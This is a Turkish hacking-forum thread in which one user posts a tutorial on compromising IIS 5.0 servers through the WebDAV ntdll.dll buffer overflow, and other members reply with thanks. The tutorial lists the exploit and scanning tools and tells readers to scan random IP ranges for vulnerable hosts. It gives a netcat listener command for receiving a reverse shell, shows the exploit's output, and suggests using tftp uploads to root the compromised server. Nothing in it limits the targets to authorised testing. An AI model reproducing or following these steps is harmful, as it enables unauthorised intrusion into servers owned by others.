İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

IIS ile Server R00tlamak //

26-01-2014 09:36
#1
ALcatraz' - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2013
Nereden:
İstanbul
Mesajlar:
4.269
Teşekkür (Etti):
968
Teşekkür (Aldı):
1755
Konular:
1022
Ticaret:
(0) %
Hacking IIS 5.0
Burada yazdıgımız yöntem WebdaV açığını kullanarak sisteme girmekten ibarettir.Dökümanı IZINSIZ KOPYALAMAYINIZ.

DavS açığını bir çok arkadaş sadece sayfaları deface etmek için kullanıp duruyor halbuki bu açığı çok daha etkin şekilde kullanmak mümkün.Bu metoddan daha önce kimse bahsetmemişti.Bende yazma gereği duydum.


1) Gerekli Programlar


1) xwbf-v0.3.exe (Webdav için Exploit)

2) PTwebdav.exe ** (Hedefin Vulnerable olup olmadıgını kontrol için)
3) A Scanner (IIS 5.0 Aramak için)
4) tftpd32.exe ** (tfpt server, dosya uploadı için)
5) Netcat (Port Listening işlemi için)

** olanlar opsiyoneldir.Programları aşağıdaki linkten download edebilirsiniz.AV Kullanan arkadaşlara söyliyorum.AV niz uyarı verebilir ama virus yada trojan olarak değil hacking tool olarak görmesinden kaynaklanır.Yani herhangi bir mesuliyet kabul etmiyorum.




2)Vulnerable IIS 5.0 Arama


Superscanner yada başka bir scanner ı çalıştırıp,herhangi bir ip aralıgını 80. i port için aratıyoruz.

Örneğin bir tane ip buldugunuzda IP adresini PTwebdav.exe progrmaına yapıştırıyoruz ve check butonuna tıklıyoruz.Program IP yi kontrol ediyor ve eger açık varsa "Vulnerable" diye size belirtiyor.Eger "Not Vulnerable " derse açık yok demektir başka IP deniyoruz.

3)Exploiting Webdav


Şimdi netcati açıp 666 nolu portu dinleyeceğiz(eger router arkası iseniz,port forwarding yapmanız gerekecektir)


Şimdi Port listening olayı için DOS a çıkacağız.

Bunun için başlata tıklayın,ordan çalıştıra tıklayın ve "cmd" yazıp enterlayın(tırnaklar yok)
Sonra netcatin bulundugu klasöre geçin ve netcatin klasöründe şu komutu yazın

nc -l -vv -p 666


Eger "Listening on any [666]" gibi bir mesaj alırsanız port listening işlemimiz tamamdır.


Şimdi xwbf-v0.3.exe ile sistemi exploitliycez.

"Satan's IP" yazan yere kendi ip nizi yazınız.
"Target " yazan yere hedef sitenin ip sini yazınız.
Geri kalan ayarlara dokunmayınız."Exploit" butonuna basınız.Şimdi program işini yapmaya çalışıyor


Checking ntdll.dll buffer overflow .....CONNECTED

send evil buffer ........ NOT VULNERABLE
If you see this, the target is vulnerable:

Gibir birşey çıkarsa sistem vulnerable değildir.


Checking ntdll.dll buffer overflow .....CONNECTED

send evil buffer ........ VULNERABLE
Connecting to [ip address] .........CONNECTED
trying ret addr 0x00d000d0 .........DONE
Waiting for IIS to restart .........CONNECTED
trying ret addr 0x00d100d1 .........DONE


Gibi bir şey çıkarsa Açık mevcuttur.Artık yapmanız gereken beklemek.Bazen çok beklemeniz gerekebiliyor hatta o kadar beklemeye ragmen genede giremeyebiliyorsunuz sisteme nedeni ise meçhul.

Eger herşey tamamsa netcati açtıgımız DOS komut satırında hedef sistemin komut satırına düşmüşüzdür.

Burdan Sonra yapacaklarınız tamamen size aittir.örneğin tftpd ile sisteme dosya atıp örneğin server win2000 ise rootlayabilirsiniz.ya da başka şeyler yapmanız mümkün gerisi için de biraz araştırısınız bazı şeyler elde edersiniz.
[COLOR=White]
Kullanıcı İmzası
En çok ne zoruma gidiyor biliyor musun? "Ülkem" diye kaydetmiştin beni telefonuna. Kalbimi parçalara ayırdın, hani vatan bölünmezdi?

Yokluğun bilinç altımdayken , varlığın kimin altında merak ediyorum.
xxHxxHxx, ByDoldis, IIKeSeRII Teşekkür etti.

26-01-2014 11:55
#2
xxHxxHxx - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2013
Mesajlar:
1.225
Teşekkür (Etti):
156
Teşekkür (Aldı):
135
Konular:
120
Ticaret:
(0) %
Mükemmel teşekkürler.
Kullanıcı İmzası
Ben bir Türk'üm. Dinim, cinsim uludur.
ALcatraz' Teşekkür etti.
26-01-2014 11:56
#3
Rival - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
10/2013
Mesajlar:
7.307
Teşekkür (Etti):
743
Teşekkür (Aldı):
1071
Konular:
2439
Ticaret:
(0) %
süper ötesi bir paylaşım teşekkürler
Kullanıcı İmzası
ALcatraz' Teşekkür etti.
26-01-2014 13:10
#4
IIKeSeRII - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2012
Nereden:
İstanbul
Mesajlar:
341
Teşekkür (Etti):
10
Teşekkür (Aldı):
13
Konular:
10
Ticaret:
(0) %
Güzel paylaşım.
Bunuda öğrenirsem çok iyi olacak.
Teşekkürler ALcatraz'.
Kullanıcı İmzası
Sql İnjection= %35

Sanal da Bunları Yapabiliyorsak;
Gerçekte Neler Yapabiliriz Siz Düşünün..



█║▌│█│║▌║││█║▌║▌║

Tüm Hakları Saklıdır © 2014



Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı